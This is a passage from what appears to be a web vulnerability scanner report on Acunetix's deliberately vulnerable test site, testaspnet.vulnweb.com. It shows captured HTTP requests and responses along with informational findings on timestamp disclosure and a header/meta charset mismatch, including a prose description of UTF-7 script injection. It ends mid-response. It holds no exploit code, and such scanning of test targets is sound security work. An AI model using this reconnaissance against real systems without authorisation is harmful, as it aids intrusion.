          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+IHWQJk8lQv/gFjjcBT7DDZEugHw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          190515149
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

  7. Risk=Informational, Confidence= (4)

    1. http://testaspnet.vulnweb.com (4)

      1. 字符集不匹配 (Header Versus Meta Content-Type Charset) (4)
        1. GET http://testaspnet.vulnweb.com
          Alert description

          This check identifies responses where the HTTP Content-Type header declares a charset different from the charset defined by the body of the HTML or XML. When there's a charset mismatch between the HTTP header and content body Web browsers can be forced into an undesirable content-sniffing mode to determine the content's correct character set.

          An attacker could manipulate content on the page to be interpreted in an encoding of their choice. For example, if an attacker can control content at the beginning of the page, they could inject script using UTF-7 encoded text and manipulate some browsers into interpreting that text.

          Other info

          There was a charset mismatch between the HTTP Header and the META content-type encoding declarations: [utf-8] and [windows-1252] do not match.

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Force UTF-8 for all text content in both the HTTP header and meta tags in HTML or encoding declarations in XML.

        2. GET http://testaspnet.vulnweb.com/
          Alert description

          This check identifies responses where the HTTP Content-Type header declares a charset different from the charset defined by the body of the HTML or XML. When there's a charset mismatch between the HTTP header and content body Web browsers can be forced into an undesirable content-sniffing mode to determine the content's correct character set.

          An attacker could manipulate content on the page to be interpreted in an encoding of their choice. For example, if an attacker can control content at the beginning of the page, they could inject script using UTF-7 encoded text and manipulate some browsers into interpreting that text.

          Other info

          There was a charset mismatch between the HTTP Header and the META content-type encoding declarations: [utf-8] and [windows-1252] do not match.

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
